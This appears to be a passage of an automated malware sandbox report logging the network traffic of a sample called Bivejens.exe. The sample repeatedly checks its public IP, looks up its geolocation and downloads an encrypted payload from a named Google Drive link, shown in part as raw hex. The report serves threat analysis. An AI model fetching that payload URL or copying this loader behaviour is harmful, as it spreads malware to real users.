2	192.168.2.10	49948	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:21.963527918 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:22.634099007 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49960	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:23.287952900 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:24.006673098 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49968	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:24.693152905 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:25.387825012 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49979	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:26.016401052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:26.718538046 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49983	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:27.321379900 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:27.994292974 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49985	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:28.727452993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:29.410079956 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49883	142.250.181.238	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:13 UTC	216	OUT	GET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 23:41:13 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 23:41:13 GMT Location: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-IX_6pqAragK-wbDrYv0D9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49890	142.250.185.65	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:14 UTC	258	OUT	GET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 23:41:17 UTC	4943	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgQGO2Jc4ZJ-isLj8HmQ8TW8_36ZWam-MsXKt8PUCZk002W_XWSyrTSaCdTzFG40w054vEVksIA Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="wzMJZbFNPJQW151.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 273984 Last-Modified: Mon, 09 Dec 2024 11:06:06 GMT Date: Fri, 10 Jan 2025 23:41:17 GMT Expires: Fri, 10 Jan 2025 23:41:17 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=reddGQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 23:41:17 UTC	4943	IN	Data Raw: f2 ab 88 47 4f 6f c2 0f 1e 42 0a 02 d0 0b b2 7f 24 d9 f1 7b 04 47 97 75 63 3e a8 a7 05 7d 37 e2 5e 29 6a a0 ed 90 89 7a dd 33 d3 2e 9e 9e 6a a1 5c 68 27 49 ef 49 d7 2a 86 7d fe a0 79 7a 0c 6e c3 5d 94 57 13 08 21 70 d0 81 7d bb 37 77 19 34 1c 2b a8 42 81 34 44 40 eb 08 58 f6 58 99 96 f3 cf 3c 73 21 1f 8f 90 77 7b ed b8 61 f2 03 86 40 91 4b 12 e2 c2 5d 38 94 ae 1d 42 7c ba 53 1b 5c fe 9a 33 20 dc b4 17 50 db 94 aa cd ba c9 f2 33 cd 6e f1 6f 01 56 b3 cb 93 e2 57 36 31 e7 b8 f5 b0 6e ee 89 0d 93 69 59 3b d4 8a e5 c5 c0 d4 e3 46 68 7b 03 44 92 e5 8f 6e 0b 83 95 82 fb f3 b5 a2 b0 5b 7a 54 2a b1 c2 86 75 c4 cc 13 f3 df e4 fa 1d 44 a9 4f c6 07 3c d3 1a c7 9b a3 7b 63 7f 4c ef e4 c4 e0 d3 67 21 84 af 4e b2 2c f6 92 f0 02 8e 48 35 5b 14 79 33 10 70 18 d5 eb aa d1 Data Ascii: GOoB${Guc>}7^)jz3.j\h'II}yzn]W!p}7w4+B4D@XX<s!w{a@K]8B\|S\3 P3noVW61niY;Fh{Dn[zTuDO<{cLg!N,H5[y3p
2025-01-10 23:41:17 UTC	4810	IN	Data Raw: f6 6a 5a 25 53 9d d7 bf bd 3d 98 39 22 20 ed 05 1a 9c 05 61 57 95 3c c1 b7 4c b8 f1 3d 5c 96 06 7a 81 13 32 22 e5 ef 93 f7 03 39 59 0c 5f 16 53 3f e3 24 17 e7 8f ef 71 52 b5 50 67 15 3d e5 30 ff 88 f0 c4 9a ab 0e 3e 9a 22 a3 25 86 53 96 14 89 c3 61 15 17 26 ba 08 01 19 9f 91 1b 64 41 53 cf 67 63 31 62 6b f2 35 f6 00 e2 4e 4b 37 98 e4 3f 6c 3b 64 d5 c4 70 38 a0 45 77 c0 21 77 f9 e8 86 35 cb 4d 22 1c 04 e6 c2 89 4e 92 e7 4e 0e 15 4a e3 2f ca e6 e1 54 55 ca a3 35 01 5a ea 75 72 44 01 f7 8c eb 3c b4 d8 42 2f 69 bd 7b 94 c3 ac 8a df 8b 93 13 64 9f ba c4 d4 39 62 ed 31 e2 49 c7 90 69 bc 9a 2c 82 db 09 4c 58 39 0e 70 35 c1 f7 b8 58 9d 61 69 64 9a b6 a3 69 5b d5 15 43 55 aa 4b 03 36 7a ee ef ff 84 39 ef c9 ee 0d 3e 5d 81 f3 3e 05 f9 33 f2 ce d9 b3 fd 76 c7 8a 27 Data Ascii: jZ%S=9" aW<L=\z2"9Y_S?$qRPg=0>"%Sa&dASgc1bk5NK7?l;dp8Ew!w5M"NNJ/TU5ZurD<B/i{d9b1Ii,LX9p5Xaidi[CUK6z9>]>3v'
2025-01-10 23:41:17 UTC	1324	IN	Data Raw: 4a 47 ea 12 00 19 33 f0 9f 74 cb 56 7e 10 22 f8 90 4a e0 7e e0 02 61 4d 1f 2b f7 31 20 ba 00 a7 e2 6a 8c f9 d3 2e 8c 19 01 18 16 8c e5 3a 7d 9c 04 b2 33 c5 88 87 20 80 f3 5e 6f 53 1b cc 1c 9a ee ef 4b 00 06 8c 9c a4 ef 41 30 fc 16 a9 a6 5b fd 1b be c4 5e 4a 56 aa 80 0f db 51 76 59 f1 5b cd 3c 63 c7 e3 dd 2a 8c 9e 49 14 c4 ea 5f c0 7d 43 1b 46 a1 1d 9e 5c 5c b8 d7 14 ee 89 c7 d7 bc 6d 71 ef c9 3f 86 a5 fe 71 a0 d9 98 6f b7 97 3e ba ec c4 85 fd 21 f2 f5 d7 8d a0 ed 46 7d d7 10 58 e2 64 8a 07 39 c1 c1 5b 4a a2 9a dc ae e6 37 99 08 2f b1 f5 ee be 95 70 93 f2 eb ea 33 0d e8 24 b9 ec 90 63 cd cc b4 38 3e 1f 9c 43 a6 53 59 1e a8 36 0f 1c e7 19 a5 6b 76 84 35 f5 34 83 aa 62 2b 03 ab 5d 48 59 e5 67 96 fc 11 de 79 e7 8f 29 1d 78 87 24 75 c9 6d e7 6d dc 98 91 aa 8a Data Ascii: JG3tV~"J~aM+1 j.:}3 ^oSKA0[^JVQvY[<c*I_}CF\\mq?qo>!F}Xd9[J7/p3$c8>CSY6kv54b+]HYgy)x$umm
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: dc c5 12 13 9d 54 2b 87 99 18 2c 5b 2a a2 6b a9 ee 84 6c f1 63 61 ba 43 39 e8 96 55 27 0e 10 1c 7f df f1 5d 8c 91 fc 3a e8 40 ed 34 21 ea 4d 64 b8 51 04 e1 f0 8d e3 65 45 40 ff a6 5b f3 1b b3 a4 2c ea 53 b9 ee df 73 3f 76 29 85 2b 91 3c 67 e5 a7 d5 23 08 85 8b 69 01 9a 77 89 7d 43 15 38 79 0c 8a 7e 0a bc c6 16 e7 42 4f 58 d5 02 0a c7 fd 35 86 be e9 01 11 f1 fa 65 b7 43 ee ba fd c0 a9 f5 4e c2 9a d6 89 d2 b0 44 a1 79 15 55 42 50 8a 0d 25 2c c5 48 42 d1 ba e5 6a 3b 5f 9f 20 75 b1 f5 e4 dd 2a 30 93 f6 98 98 27 7f cc 3d 91 14 32 46 d0 f2 f1 39 2d 13 2f 60 87 e2 35 11 a8 38 82 39 fe 63 ef 5a 74 80 e7 c6 06 79 38 6d 21 65 f7 79 40 20 de 60 af c8 b2 fb 65 95 3b d8 1b 35 25 0c 0f ba aa ed 02 8a b0 59 a0 99 2b 30 ba 59 ad fe 58 9e 04 01 83 c4 02 a6 4f fe 3b 9c 4e Data Ascii: T+,[klcaC9U']:@4!MdQeE@[,Ss?v)+<g#iw}C8y~BOX5eCNDyUBP%,HBj;_ u0'=2F9-/`589cZty8m!ey@ `e;5%Y+0YXO;N
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: df 17 7b 01 e0 4c ce 7d 6b 71 29 67 17 43 6d 4b bc c6 10 e7 9f b0 6b d5 02 2b 9d 9e 37 86 c4 ec 36 99 d9 98 6f a1 b7 31 a9 f8 d1 ac cc 71 f7 9a d6 8d b4 19 40 9c 09 03 7b b9 97 8a 07 39 fa 0c 5b 62 ca 9a af 6d 3b 5f 95 1b 29 a0 f3 90 fa a7 70 97 85 53 bd 31 07 f7 f9 91 64 9a 63 d6 dc 25 f5 2d 19 87 3b a2 90 5b 1a c7 85 20 1c ed 1d c6 5c 06 fe 55 e3 6c 23 11 62 21 1f 27 cc 4b 5e 84 48 f4 cc 10 d4 16 29 9b d7 11 45 96 22 68 37 ea e7 6d d7 95 4f d8 48 19 2b 47 bb 88 e9 71 00 12 73 5d 74 27 ce 9f b5 23 b4 85 d3 0e 6d fb ad a0 7f 78 a5 12 6e 22 9c 39 77 f8 0a 9b fd a9 a5 98 6b ca 2f ac fd 9d 1a 0f c4 6c 9b a2 d7 b2 8f 28 53 51 3f a5 e8 66 ba 7d d9 88 01 e0 a5 ea c0 8f 37 b6 db c8 95 f8 1a 00 0a cf ad 9e 1a d8 18 60 c6 a5 97 e7 ce cf f0 25 e5 35 b6 cf 4d 93 44 Data Ascii: {L}kq)gCmKk+76o1q@{9[bm;_)pS1dc%-;[ \Ul#b!'K^H)E"h7mOH+Gqs]t'#mxn"9wk/l(SQ?f}7`%5MD
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: 32 52 9f 24 6f 65 cf 9d d6 ae 0f 39 2d 18 a5 71 9f 90 51 c0 6e 68 13 1c ed 9d ff d1 74 84 4f 99 1b 27 ac 4a 43 15 55 56 5b 74 f4 61 bf cc 10 df 79 e6 9b 5e 85 45 8b ae 73 ba aa f4 5d d2 b0 05 aa 8a 0a 0b 37 19 bc fe 44 36 52 73 57 d7 27 c0 9f 27 38 b4 85 d3 0e 63 ad 2e a0 7f 76 a5 12 6c 22 2c 26 77 f8 0a 96 98 d7 9d 92 04 01 8d 89 ed ef f6 2b c4 1c 3d f4 38 cc 93 22 40 52 41 56 87 be b0 df f6 85 74 a7 6b ea b0 27 1f b4 e7 c8 9f f7 41 6c 0a cf ad 8a 7d fa 29 60 cc ad ed ba e7 cf 86 19 d6 8d bf cf 89 82 ba d7 c2 58 89 2a 91 da bb 9f 04 47 e9 c0 38 73 49 f1 b9 9e 87 ff 9f 76 cb ff 89 4d 76 f3 61 36 48 ef 7c c1 d6 a8 70 97 13 22 4e cc b3 66 1b 3a 84 f7 28 e5 f6 21 00 db 52 94 d0 86 99 66 98 39 36 c7 b9 05 1a 0c 2c 4c 57 9b 36 b3 85 5c b8 81 2a d3 95 06 7a 2d Data Ascii: 2R$oe9-qQnhtO'JCUV[tay^Es]7D6RsW''8c.vl",&w+=8"@RAVtk'Al})`XG8sIvMva6H\|p"Nf:(!Rf96,LW6\z-
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: 71 21 74 a5 95 ac 7f 7c 2f 49 74 50 48 29 66 9c 80 68 81 a9 af 81 12 77 0b bd f7 ed 1a 09 c4 6c 9b a3 09 a3 8f 52 51 40 06 7f 87 be b0 6e c4 eb 3a 9e 7f 9a e8 d3 37 c8 ed db 8d ed 71 a2 7f c8 a7 fd 7d 7b 29 60 cc a1 cd ea cc cf 8a 22 da d2 ea cf 47 8f a9 ce f2 40 fb b3 80 a4 d7 f0 da 43 86 3f 38 62 5b 92 fa 11 ee e5 e6 81 43 ff 83 47 71 15 0d dc 4e d6 da d5 cc b9 14 b5 0a 34 5b a7 6a 0d 74 14 92 df aa e5 e7 31 79 94 53 9f dd bf ac 7f f7 d8 22 17 e6 16 01 1c 1f 0e d7 9b 3c cb a4 56 a9 eb 4e ee 96 06 70 3f 0e 23 3e 91 6d 93 f7 c1 2b 44 1d 4d 79 e1 3f e3 2e 17 f6 95 80 c0 52 b4 5a 67 04 f1 8b d2 ff 50 fb c4 9a 83 cd 3e 9a 67 a3 25 91 60 db 17 89 b1 61 35 17 39 ba 08 38 67 9f e3 9b 6d 5d ae 85 61 0c 53 47 7d 8a 87 dd fe 96 75 0c 26 9d ce 90 4f 33 3a 86 ab 14 Data Ascii: q!t\|/ItPH)fhwlRQ@n:7q}{)`"G@C?8b[CGqN4[jt1yS"<VNp?#>m+DMy?.RZgP>g%`a598gm]aSG}u&O3:
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: d7 e3 52 f7 70 91 a4 a3 b7 4e 43 86 3f 46 6c 43 83 e7 b7 cd 8f 89 54 e1 eb 9d 53 48 cc 62 3c 44 a2 58 c6 d6 a9 05 a4 14 50 3a ae e4 14 74 88 92 df aa e5 f1 55 54 25 53 9b a9 fc bd 67 9c 4a e1 17 ec 0f 75 c9 04 61 5d 9b 14 9b b7 4c b2 ec b0 1e 96 06 7b 09 04 40 3e e8 ef e3 55 ee 2f 71 b7 51 16 59 9d c6 3c 65 89 80 ef 01 f0 91 49 19 2d ea e4 34 5d 75 eb b6 a1 b8 0e 4e 38 42 b8 5b a7 48 a6 13 2b 9e 7d 67 3f 23 ba 78 b2 31 e3 e3 91 67 2e 7f c5 61 06 5e 65 63 76 43 bc 91 23 5d 4e 2c 9d c8 35 05 e2 44 c3 a1 19 31 a8 59 75 4e 63 03 a1 87 e5 3f cb 4e 52 8d fa e4 db 8f 81 98 cb 4c 24 04 5c ac 41 af e6 eb 5e 83 14 b3 1b 2e 68 c2 35 78 57 03 fb d7 ef 3c b4 d8 92 59 6d b5 08 f3 c3 ac fe 82 e3 93 17 1c a7 d1 c4 a4 25 59 61 ef f2 66 f9 5a 68 af 95 2e 80 e2 fd 2c 58 39 Data Ascii: RpNC?FlCTSHb<DXP:tUT%SgJua]L{@>U/qQY<eI-4]uN8B[H+}g?#x1g.a^ecvC#]N,5D1YuNc?NRL$\A^.h5xW<Ym%YafZh.,X9
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: 54 32 22 fa 4d b6 ed b9 c0 48 0c 21 b4 76 24 f8 a9 57 e7 8f ee 54 44 c6 2a 77 15 9a 46 15 e8 78 4a c4 9a b1 ac 1b 82 15 45 33 87 38 04 32 90 93 da 15 17 3f 18 2d 0a 6b cb f1 91 1d e3 0b b9 61 0c 58 c0 43 84 2a d6 f4 f5 42 3c 06 8a c8 42 14 3b 44 c3 af 3c 71 a0 4f 77 b2 a2 7e ff f7 cd 76 cb 47 3b 2d e5 f5 c4 a7 1a 94 cb 43 08 de 2a c2 40 af c3 c9 6a 5f ca aa 2d 26 5c ea 57 72 44 0d 25 ff 8d 3c b4 d2 31 12 6b b5 0c 81 94 ae 80 c0 f5 bb 9b 6e f0 d9 d2 2a 32 62 c8 fe d3 55 21 a4 69 bc b8 65 85 db 2b 33 d5 79 04 ae 34 e4 cb cb 54 8b 61 19 c6 be a1 ee b4 5b c5 5a e1 70 b3 22 5d 3a 7a 2f 4d da 9d 53 d7 c9 ff 09 9c 50 f1 81 05 0c f2 44 78 b1 c2 cd d7 75 a8 d2 85 f6 4c 0e 2b 6e aa 32 97 5e 7b 51 6f 05 54 0c 2e 4c 3d 2a 55 8f f9 6e a4 2a 6c 29 d0 84 b1 e1 78 33 0e Data Ascii: T2"MH!v$WTDwFxJE382?-kaXCB<B;D<qOw~vG;-C@j_-&\WrD%<1kn2bU!ie+3y4Ta[Zp"]:z/MSPDxuL+n2^{QoT.L=Unl)x3
2025-01-10 23:41:17 UTC	1390	IN	Data Raw: 57 6f 4f 7d ca 0a 12 c3 87 e5 31 b8 97 3d 3c f0 f7 d9 f1 6e 94 cb 41 7a 54 57 c3 30 b9 ce 69 5e 5f c0 b6 c0 07 4f cb 24 7b 68 0b ea f7 9a 53 65 d2 4f 2c 6b b5 23 f8 c3 bd 88 a6 8c 42 13 6e fa d3 c4 c5 3b 0f d7 ef f2 68 c7 76 69 bc 9a 50 56 db 21 24 58 28 0c d0 0f c1 dd bd 36 a6 61 69 60 e8 75 c6 0f 51 aa 84 43 55 a1 50 22 3d 6b 58 80 2a 84 2d e5 c9 ee 0a 51 a3 eb f3 34 0f 2c 24 ff bc ed b3 f7 7f bb dc 27 fb 32 7c 03 72 74 42 35 76 07 2f 41 0f 3b 54 5c f4 27 39 07 82 5c a6 a4 2a 67 1a 38 f7 98 fd 69 48 95 b1 c7 a5 98 d2 e7 4f 9d e5 bf fa 33 48 37 9a 10 05 ca e8 b3 c2 50 d3 a5 06 d9 87 d9 75 64 88 4c d5 75 bb c8 33 3e 2f 26 58 b4 08 c4 3f a9 57 09 b1 4b b3 87 8e 07 0e 29 2d 08 21 74 bb 4c 7d bb c2 88 08 38 d6 51 b8 42 f1 1c ff 40 ab 02 2a 66 48 99 e6 db 94 Data Ascii: WoO}1=<nAzTW0i^_O${hSeO,k#Bn;hviPV!$X(6ai`uQCUP"=kX-Q4,$'2\|rtB5v/A;T\'9\g8iHO3H7PudLu3>/&X?WK)-!tL}8QB@*fH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49925	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:41:19 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867268 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wpmn8kdahvDa9QPk1bxQLy5NCdpXq%2Bs0XzbR8k2LbSfYHz95EWLEZcdy7rUUvaZ%2FrUtzKsVSOfsF%2BknMFbVR1DYUnbeue9C2FN4G%2FSvbF5zLhtVzT0yFjFnm9%2BYH42O4Y4o62N%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900084669ced42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1546&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1801357&cwnd=229&unsent_bytes=0&cid=8973a98ef2e38a47&ts=145&x=0"
